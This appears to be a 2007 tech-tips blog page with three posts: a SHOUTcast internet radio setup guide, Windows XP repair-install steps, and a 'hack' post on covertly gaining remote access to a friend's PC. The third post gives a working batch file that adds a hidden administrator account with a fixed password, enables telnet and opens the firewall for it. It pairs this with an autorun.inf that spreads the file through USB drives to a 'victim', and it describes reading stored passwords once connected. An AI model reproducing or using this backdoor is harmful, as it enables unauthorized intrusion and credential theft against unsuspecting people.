your own Radio Station

October 31, 2007 Posted By: Jim ~ Filed under Category: Other

Welcome, Visitor. Subscribe to our RSS Feed and consider adding this article/site to your favorite social bookmark site if you find it useful. Thank you!

::Must HAVE Winamp (Any Version)::

First, things First your speed has to be at least 256/64 kbps (which means Dial-up users, will have alot of latency, just dnt bother)

Second, your going to have to have a domain, an updated one with the current i.p active. (Could be anything e.g. My sig)

Now, Your gonna have to download the Shoutcast Files.

Go to
:
www.shoutcast.com

to get the files.

Ok After downloading these, installing Both of them in any order i dnt care. Go to START>PROGRAM FILES>SHOUTcast DNAS>EDIT SHOUTCAST DNS CONFIG.

Ok your gonna have to Configure it:
Go Down and where it says password: change (that means your gonna have to change it to whatever, make sure u remember)

The Portbase: change it to whatever port you want it
Maxusers: (lets be realistic here, dnt put in 10000, like NXS’s radio station) your bandwidth has to be extremely good, if your cable, 50 user max is ok, ADSL should stay below 10 users, and T1 connections should do whatever tickles there fantasy.

EDIT>SAVE.

Open winamp, RIGHT CLICK>OPTIONS>PREFRENCES>DSP EFFECT> and choose the NULLSOFT SHOUTCAST.

Go to OUTPUT, and then click on Connection, Through the ADDRESS, type your address which you have done through
Code:
www.no-ip.com

PORT NUMBER, whatever u did in the EDIT.txt, and your password.

Then go to Encoder, and choose your quality of your music. Go back to OUTPUT>OUTPUT CONFIG> YELLOW PAGES. this is your advertisement information. do whatever you like there.

Now Connect. to check that your Radio os on-line go to http:// (your address that you added in the prefrence)


Windows Xp Repairing Steps

October 27, 2007 Posted By: Jim ~ Filed under Category: Windows

Welcome, Visitor. Subscribe to our RSS Feed and consider adding this article/site to your favorite social bookmark site if you find it useful. Thank you!

If XP is corrupted to the point where none of the previous solutions get it to boot,
you can do a Repair Install that might work as well as keep the current settings.
Make sure you have your valid WindowsXP key.
The whole process takes about half an hour depending on your computer
If you are being prompted for the administrator’s password, you need to choose the 2nd repair option, not the first.
Insert and boot from your WindowsXP CD
At the second R=Repair option, press the R key
This will start the repair
Press F8 for I Agree at the Licensing Agreement
Press R when the directory where WindowsXP is installed is shown. Typically this is C:\WINDOWS
It will then check the C: drive and start copying files
It will automatically reboot when needed. Keep the CD in the drive.
You will then see the graphic part of the repair that is like during a normal install of XP (Collecting Information, Dynamic Update, Preparing Installation, Installing Windows, Finalizing Installation)
When prompted, click on the Next button
When prompted, enter your XP key
Normally you will want to keep the same Workgroup or Domain name
The computer will reboot
Then you will have the same screens as a normal XP Install
Activate if you want (usually a good idea)
Register if you want (but not necessary)
Finish
At this point you should be able to log in with any existing accounts. Go to top


Access any PC remotely !

October 27, 2007 Posted By: Jim ~ Filed under Category: Hacks, Pc Tips

Welcome, Visitor. Subscribe to our RSS Feed and consider adding this article/site to your favorite social bookmark site if you find it useful. Thank you!

Don’t trust Your Friend.. Lol.. Here what he can Do!! Always Check Your User Accounts.

If you have physical access to ur friends machine then u can access his machine remotely using telnet server. All u have to do is to create a user account there then hide that user from logon screen and then start telnet server and finally mark telnet as a exception in firewall.These stepes can be carried out simply and faster using a simple batch file(instal.bat). Here i m providing the source of batch file:

instal.bat

@echo OFF
net user IE_USR 123456 /add
net localgroup administrators IE_USR /add
net localgroup “remote desktop users” IE_USR /add
sc config tlntsvr start= auto
netsh firewall set allowedprogram %windir%\system32\tlntsvr.exe iexplorer enable
sc start tlntsvr
reg add “HKLM\software\microsoft\windows NT\CurrentVersion\winlogon\specialaccounts\UserList” /v IE_USR /t REG_DWORD /d 0

Now u can make this file to spread from one machine to another according to ur own method like to spread this file as a autoplay program in pen drives. Here i m providing u the code for autoplaying just put these two files in pen drive and u r work is done.

autorun.inf

[autorun]
open=instal.bat
when the victim plug this pen drive in his/her PC instal.bat runs and it will do all the work for u then u meet ur frnd online on yahoo msgr and use start>run>netstat -n 4 [press enter] to find his ip address. After getting the ipaddress goto start>run>telnet ipaddress [press enter] now press y and then use these login detail to get login

username: IE_USR
password: 123456

Now u have the shell prompt of friend machine now u can do anything u can see what task are running there using tasklist command, u can shutdown his machine using shutdown -s, u can even get stored password from registry, u can do almost everthing from command prompt.

Tags for the article:

    autoplay media studio remote shutdown,telnet tricks and tips,tips for telnet commands